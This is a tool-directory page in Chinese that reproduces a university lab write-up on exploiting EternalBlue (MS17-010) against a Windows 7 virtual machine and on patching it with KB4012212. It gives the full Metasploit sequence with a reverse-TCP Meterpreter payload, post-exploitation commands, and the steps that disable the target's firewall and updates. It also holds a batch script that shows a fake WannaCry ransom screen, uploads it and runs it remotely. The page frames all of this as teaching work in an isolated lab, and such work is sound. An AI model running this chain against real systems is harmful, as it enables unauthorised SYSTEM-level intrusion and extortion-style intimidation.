Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
EternalBlue-Exploit-Demonstration-MS17-010 — 网络安全实验室,演示利用CVE-2017-0144(EternalBlue)通过Metasploit攻击易受攻击的Windows 7虚拟机,实现SYSTEM级访问(通过Meterpreter)。包含完整攻击链、后期利用以及通过MS17-010补丁进行缓解,已在隔离的道德实验室环境中测试。 | Kitploit
工具/GitHubGitHub/ichhyak22/eternalblue-exploit-demonstration-ms17-010
权限提升Payload生成漏洞分析漏洞利用后渗透利用恶意软件分析渗透测试命令与控制学习与教育

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
事件响应
实验室与实践
GitHubichhyak22/eternalblue-exploit-demonstration-ms17-010

EternalBlue-Exploit-Demonstration-MS17-010

网络安全实验室,演示利用CVE-2017-0144(EternalBlue)通过Metasploit攻击易受攻击的Windows 7虚拟机,实现SYSTEM级访问(通过Meterpreter)。包含完整攻击链、后期利用以及通过MS17-010补丁进行缓解,已在隔离的道德实验室环境中测试。

查看仓库
54个月前尚未审核

EternalBlue 漏洞利用演示 (MS17-010)

网络安全实验室,演示利用 CVE-2017-0144 (EternalBlue) 通过 Metasploit 攻击易受攻击的 Windows 7 系统,通过 Meterpreter 获取 SYSTEM 级别访问权限。

该项目还模拟了一次 WannaCry 风格的勒索软件攻击(安全演示),并演示了使用 MS17-010 安全补丁的缓解措施。


模块信息

模块: CSCM828 安全漏洞与渗透测试

学生:

  • Daniel Nicolas Rentapalli (2548048)
  • Ichhya Koirala (2607189)

大学: 斯旺西大学


资源与下载

  1. MS17-010 EternalBlue SMB 远程 Windows 内核池损坏
    https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/

  2. KB4012212 (Windows 7 x64 安全更新)
    https://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212%20Windows%207%20x64

  3. Kali Linux (虚拟机下载)
    https://www.kali.org/get-kali/#kali-virtual-machines

  4. Windows 7 SP1 Home Premium 英文版 x64 (ISO)
    https://archive.org/details/windows-7-home-prem-english

  5. VMware Workstation Pro
    https://www.vmware.com/products/desktop-hyper


1. 概述

本实验演示:

  • 远程利用 SMB 漏洞 (MS17-010)
  • 通过 EternalBlue 获得内核级访问权限
  • 建立 Meterpreter 会话
  • 后期利用技术
  • WannaCry 风格勒索软件模拟(安全)
  • 通过打补丁进行缓解

2. 实验环境

要求

  • VMware Workstation / VirtualBox
  • 最低 8GB 内存

攻击机

  • Kali Linux
  • Metasploit 框架

目标机

  • Windows 7 SP1 x64(未打补丁)

网络

  • 仅主机 / NAT(隔离环境)
  • 确保两台机器可以通信

⚠️ 本实验必须在完全隔离的环境中进行。


3. 目标机设置 (Windows 7)

以管理员身份运行命令提示符:

禁用防火墙

root@kitploit:~
netsh advfirewall set allprofiles state off

验证 SMB 端口

root@kitploit:~
netstat -an | findstr :445

禁用更新(为了实验稳定性)

root@kitploit:~
sc stop wuauserv
sc config wuauserv start= disabled

4. 攻击机设置 (Kali Linux)

验证连通性

root@kitploit:~
ping <victim-ip>
nmap -p 445 <victim-ip>

5. 利用步骤

步骤 1:扫描目标

root@kitploit:~
nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>

预期结果:

  • 主机存在漏洞

步骤 2:运行漏洞利用

root@kitploit:~
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <victim-ip>
set LHOST <attacker-ip>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run

步骤 3:确认访问权限

root@kitploit:~
meterpreter > getuid

预期结果:

root@kitploit:~
NT AUTHORITY\SYSTEM

6. 后期利用

root@kitploit:~
sysinfo
getuid
ps
screenshot
shell
whoami
ipconfig

稳定迁移

root@kitploit:~
ps
migrate <explorer.exe PID>

7. WannaCry 模拟(安全演示)

创建载荷 (Kali)

root@kitploit:~
cat > /tmp/wannacry64.bat << 'EOF'
@echo off
title WannaCryptor Demo - SAFE SIMULATION
color 0a
mode con: cols=80 lines=25
cls

setlocal enabledelayedexpansion

set id=%random%-%random%-%random%
set /a timeleft=60

:main
cls
echo ========================================================
echo           WANNA DECRYPTOR 0.4 x64 (DEMO)
echo ========================================================
echo.
echo  All files have been encrypted!
echo.
echo  Send 0.25 BTC to:
echo  13AM4VWSEwlt4cLnoQNFfqJDwZ8m9dkVml
echo.
echo  Personal ID: %id%
echo.
echo  Time remaining: !timeleft! seconds
echo.
echo ========================================================
echo.

echo Initializing encryption...
timeout /t 2 >nul

for /l %%i in (1,1,20) do (
    set /a percent=%%i*5
    call :progress !percent!
    timeout /t 1 >nul
)

goto countdown

:progress
set bar=
set /a blocks=%1/5
for /l %%b in (1,1,!blocks!) do set bar=!bar!#
cls
echo ========================================================
echo           ENCRYPTING FILES...
echo ========================================================
echo.
echo Progress: [%bar%] %1%%
echo.

set /a randfile=%random% %% 5
if !randfile!==0 echo Encrypting: documents.docx
if !randfile!==1 echo Encrypting: photos.jpg
if !randfile!==2 echo Encrypting: database.sql
if !randfile!==3 echo Encrypting: backup.zip
if !randfile!==4 echo Encrypting: project.pptx

exit /b

:countdown
cls

:loop
cls
echo ========================================================
echo           YOUR FILES ARE ENCRYPTED
echo ========================================================
echo.
echo  Pay within the time limit or files will be lost!
echo.
echo  Time remaining: !timeleft! seconds
echo.
echo ========================================================
echo.

if !timeleft! LEQ 0 goto end

set /a timeleft-=1
timeout /t 1 >nul
goto loop

:end
cls
echo ========================================================
echo              TIME EXPIRED
echo ========================================================
echo.
echo  Your files are permanently locked.
echo.
echo  (This was a SAFE DEMO simulation)
echo.
echo ========================================================
pause
EOF

上传并执行

root@kitploit:~
meterpreter > upload /tmp/wannacry64.bat C:\\Windows\\Temp\\wannacry64.bat
meterpreter > execute -f cmd.exe -a "/c start C:\Windows\Temp\wannacry64.bat"

8. 缓解措施(补丁演示)

步骤 1:下载补丁

  • 访问:https://www.catalog.update.microsoft.com/
  • 搜索:KB4012212 Windows 7 x64
  • 下载 .msu 文件

步骤 2:安装补丁

root@kitploit:~
wusa.exe KB4012212-x64.msu /quiet /norestart

步骤 3:重新启动

root@kitploit:~
shutdown /r /t 0

步骤 4:验证补丁

root@kitploit:~
systeminfo | findstr KB4012212

步骤 5:重新运行漏洞利用

预期结果:

  • 漏洞利用失败
  • 没有 Meterpreter 会话

步骤 6:使用 Nmap 验证

root@kitploit:~
nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>

预期结果:

  • 不存在漏洞

9. 故障排除

问题解决方案
漏洞利用失败检查网络连通性
无法建立会话禁用防火墙
会话中断重新尝试利用
窗口不可见迁移到 explorer.exe

10. 道德考量

本项目严格遵循:

  • 仅在受控实验机上执行
  • 在完全隔离的网络中进行
  • 仅用于教育目的

未经授权使用违反:

  • 英国 1990 年计算机滥用法案

11. 结论

本实验演示:

  • 使用 EternalBlue 进行真实世界的 SMB 漏洞利用
  • 对 Windows 7 实现 SYSTEM 级别的入侵
  • 勒索软件攻击模拟(安全)
  • 及时打补丁的重要性
下载工具